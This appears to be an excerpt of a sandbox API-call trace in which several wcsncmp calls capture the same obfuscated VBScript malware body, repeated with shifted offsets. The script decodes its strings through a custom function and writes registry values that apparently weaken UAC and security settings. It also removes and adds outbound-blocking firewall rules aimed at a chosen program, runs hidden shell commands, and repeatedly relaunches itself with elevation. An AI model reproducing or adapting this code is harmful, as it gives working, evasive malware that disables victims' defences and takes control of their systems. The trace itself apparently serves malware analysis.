bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.307] wcsncmp (_String1="-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 32 [0226.307] wcsncmp (_String1="65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 41 [0226.307] wcsncmp (_String1="5)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 40 [0226.308] wcsncmp (_String1=")*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 